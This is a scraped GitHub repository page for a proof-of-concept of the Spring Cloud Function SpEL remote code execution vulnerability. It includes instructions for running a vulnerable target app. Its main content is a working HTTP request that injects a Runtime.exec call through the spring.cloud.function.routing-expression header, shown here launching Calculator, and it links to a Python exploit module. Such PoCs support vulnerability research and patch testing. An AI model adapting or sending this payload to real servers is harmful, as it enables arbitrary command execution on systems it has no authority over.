Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Sign up
Appearance settings

cckuailong/spring-cloud-function-SpEL-RCE

Folders and files

NameName
Last commit message
Last commit date

Latest commit

History

5 Commits

Repository files navigation

spring-cloud-function SpEL RCE

Vultarget

You can build it for youself. here is the source of the Vuln App

Or you can use the release which built by cckuailong(Yh,it's me) 

java -jar function-sample-pojo-3.2.1.RELEASE.jar

P.S. test with Java17

Poc

POST /xxx HTTP/1.1
Host: test.com:8080
spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator")
Content-Type: application/x-www-form-urlencoded
Content-Length: 3
xxx

Result

RCE!!

demo

Enjoy it!

I put the poc code in the repo:

https://github.com/cckuailong/pocsploit

https://github.com/cckuailong/pocsploit/blob/master/modules/vulnerabilities/springcloud/springcloud-function-spel-rce.py

demo2

Article

About

spring-cloud-function SpEL RCE, Vultarget & Poc

Resources

Stars

Watchers

Forks

Packages

No packages published

Languages

AltStyle によって変換されたページ (->オリジナル) /